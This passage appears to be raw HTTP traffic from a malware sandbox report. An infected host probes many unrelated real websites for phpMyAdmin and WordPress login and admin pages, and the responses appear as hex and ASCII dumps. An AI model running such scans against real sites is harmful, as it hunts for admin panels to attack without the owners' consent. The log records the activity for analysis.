                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.631299019 CET233OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.825246096 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                144192.168.2.657396172.67.204.2980
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.631300926 CET227OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: khodyari.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.496107101 CET856INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:32 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://khodyari.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6rHl52J1PrmL4R8GK0gwg%2Bjjije3lOorqw3JOIRO6Av0fcBWU1Lw0pZoXkah5xkRNgG6gioUWjJTTeKQpzS02%2FqYLL%2FTGPgSIAOxC6aY0RHpV5eYtIT4%2Bmn64ZU6bYM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                CF-RAY: 82efaf58fbdd3968-IAD
                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                Data Raw: 39 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 9b<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.496117115 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                145192.168.2.65734785.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.631998062 CET224OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.847409964 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=z5yl5z5srju4rf2wkb4qhiw2; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzW
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.847424030 CET1340INData Raw: bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: E?z/w]\~=?yz=*oE~_|q^\||?N~g';W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.847436905 CET1340INData Raw: 8d 1e 93 2f 54 2f cc 9f 3e 29 bd df fd 5f e9 37 03 d5 70 21 72 1a 66 5c fe f7 9b f9 50 df 2e ab 8b ca 7e ef a6 ef 2e d0 74 b3 e0 10 a0 3f e8 77 03 84 dc e7 ed 66 b1 7d 90 06 48 fc d8 8f 49 c6 e1 ad c9 38 cc 35 e3 a0 5f df 04 6e df 01 22 84 f4 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: /T/>)_7p!rf\P.~.t?wf}HI85_n"t/UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@L
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.847450972 CET1340INData Raw: 48 c3 40 e8 57 42 4b 20 71 14 43 c4 12 70 ff f8 9f fc 16 0d e9 6f 52 a7 04 94 7e a7 96 0a 39 85 8f 4b 7f 32 78 f9 b5 c9 48 d7 ee 3e 1c 47 c6 87 01 7e 23 d4 0d 07 4e 32 f4 b6 ad ab 65 f1 76 dd 80 c5 0a 0a 2a 48 33 0d f9 7d 45 4a d9 65 fb 02 c6 b6
                                                                                                                                                                                                                                                                                                                Data Ascii: H@WBK qCpoR~9K2xH>G~#N2ev*H3}EJeCGo4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.050092936 CET1340INData Raw: 58 38 81 88 87 e8 9e 45 87 07 e9 27 39 b1 86 fe 8f fe c5 e6 8d d4 4b b4 5a 7e a7 e7 03 3b f9 47 ff 3c fa fb 1f fd ab e5 83 7f f4 2f 66 9d f3 be e0 fd e4 e8 3f fa b7 fe a3 7f 1f 7e ff 3a 70 22 b9 d0 7f f4 6f 6d fe d1 bf 98 82 be af 0f 74 30 ab f3
                                                                                                                                                                                                                                                                                                                Data Ascii: X8E'9KZ~;G</f?~:p"omt0.,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.050106049 CET431INData Raw: ed ea e2 e4 d3 8b 9f fa ee ab cb af de ee ed ff e4 c9 c5 77 76 de af 13 12 dd e9 5b e9 e3 e5 de a4 f9 bd d7 ed ef 73 fe fa 3b 2f 5e 5f 5d 5d 3c 5d fc 60 af 3a de 9e 9e 65 af 7e 62 ef 60 fe fb bf 7c fd fb 2c ef bd 58 fd fe 7b 07 5f f4 fa e0 7f 4c
                                                                                                                                                                                                                                                                                                                Data Ascii: wv[s;/^_]]<]`:e~b`|,X{_LGTth}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.054166079 CET312OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: ASP.NET_SessionId=z5yl5z5srju4rf2wkb4qhiw2
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://bokod.hu/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.268023968 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57 bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7 fd 27 fb 3b bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzWE?z/w]\~=?yz=*oE~_|q^\||?N~g';
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.268070936 CET1340INData Raw: ce 57 ed a7 a7 c7 2f 5e 9e dd bb f8 7a 7d 4e ca 75 5e 2c 56 db 17 59 59 e6 f5 b5 76 fb dd f6 f3 ec bb a7 c7 cf bf 7a bb ff dd e6 cb b3 f5 6c f9 e5 f9 83 f5 d3 df e7 27 7e 70 f0 f2 c5 ef 73 fd 7b 3d b9 b7 77 fa 7b 1d 3f f9 c9 e7 4f bf 66 b7 e7 c4
                                                                                                                                                                                                                                                                                                                Data Ascii: W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{':;{}3Eg^o-?o^tqsz|3O:'O
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.268083096 CET1340INData Raw: af 0b 12 1d 17 d8 55 cb b7 44 bf 6c 79 fd 83 ac bd bb 5e 16 55 b3 4d e6 f5 a7 f3 b7 6d fe 36 18 42 0c d2 76 9b d7 97 b7 02 b5 4d 9d ee e2 9f 07 01 50 7f 20 de ef fe af f4 9b e9 57 29 be cc 2e cd f8 fc 6f 23 b3 45 2d cd b7 f4 eb 24 e3 af d2 34 fa
                                                                                                                                                                                                                                                                                                                Data Ascii: UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@Lm{Rd<+Ef146Gg5'h!)?krffV"NH$FG
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.268107891 CET1340INData Raw: af 34 4c 65 95 98 2c 01 c5 6f 64 00 60 c0 4b 0a bf 28 cd 0d 69 a3 3f a4 53 fe e4 67 b3 e3 e6 07 d9 84 d6 19 88 0c c4 26 f4 cd 25 e4 f1 35 7d 48 fd 13 81 f4 9b 11 2b eb 0f 94 45 4a 78 95 97 19 a5 8b 6a 62 3c 88 c1 0b 7c 20 fd f0 a7 f2 2b 7d f5 41
                                                                                                                                                                                                                                                                                                                Data Ascii: 4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[=yS"D%DfwWI/K)g;]5si9JlI]TV
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.268120050 CET1340INData Raw: d1 f1 a0 ab 2e e1 df 2c 47 74 79 83 a8 47 6a fb 1f fd ab 7f f0 8f fe d5 44 3a fa 44 bf 7b 3f d6 d0 90 e1 1f fd fb 4a 02 43 31 3c 2d 0d d0 2f 5f 03 9f e7 f9 c5 f2 1f fd ab 57 b0 63 ff f8 df 3c 99 a4 d3 e2 ed 5b 0c 8c be 92 46 37 61 06 bc f8 17 4f
                                                                                                                                                                                                                                                                                                                Data Ascii: .,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_0m@;q4ww%uhn|'r{_M2+o(B{+{mjbl
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.268130064 CET343INData Raw: 74 f7 dd 9f ce 68 7d 8a 3f 15 25 f3 bb 6d cd aa 29 67 17 ef 8c eb 3c 9b 5d 6f 9d af 97 53 08 74 ba 75 27 fd c5 68 42 6d 3e 1a 33 5a 1f dd 91 9f 5b f2 f9 8f 65 6b 52 a5 24 92 8f 52 a4 c0 46 e1 87 af 57 79 3e 7b 94 7e ba b3 b3 63 be 99 65 a4 2a 2e
                                                                                                                                                                                                                                                                                                                Data Ascii: th}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[gFQfd_}8OcfQ]'qQUF}SF^%oNi@FF|D_"(S-


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                146192.168.2.65745985.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.632879972 CET224OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.843677044 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=oapnk3hjjknady5gfqszwsoq; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
